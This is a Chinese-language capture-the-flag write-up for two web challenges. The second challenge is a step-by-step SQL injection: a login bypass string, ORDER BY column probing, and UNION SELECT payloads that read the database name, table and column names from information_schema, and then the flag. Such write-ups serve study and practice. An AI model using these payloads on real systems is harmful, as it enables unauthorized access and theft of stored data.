web01

右键查看源代码，再使用在线解密，就可以得出答案了

web02 sql注入

1. admin' or 1=1 或者 1 or 1=1可以登录
2. 查询几个字段：1' or 1=1 order by 3 # 使用此语句，判断列数。
   order by 3不会出错，但是order by 4就没有显示了，因此判断共有3列。
   ORDER BY 子句中的数字（如 ORDER BY 4）通常表示按照查询结果中的第几个列进行排序，而不是列名。这意味着 ORDER BY 4 将根据查询结果中的第四列进行排序。
   
3. 使用-1' union select 1,2,3 # 判断回显的位置
   发现回显位置是2
   
4. 1' union select 1,database(),3# 查看数据库名称，发现是web2
5. 1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database(); # 查看数据库中的表，返回有 欢迎你，flag,user，说明一共有两个表，分别是flag和user
6. 1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag';#查看列名，发现只有flag
7. 1' union select 1,group_concat(flag),3 from web2.flag;# 显示数据，得到答案了
   

补充知识：

• group_concat(table_name) 是一个聚合函数，它将返回符合 WHERE 条件的所有表的名称，并用逗号分隔。
• information_schema是一个标准的数据库系统中的元数据信息存储区域，它包含了关于数据库结构的信息，比如数据库、表、列、索引等的信息。
• 万能密码：admin' or 1=1#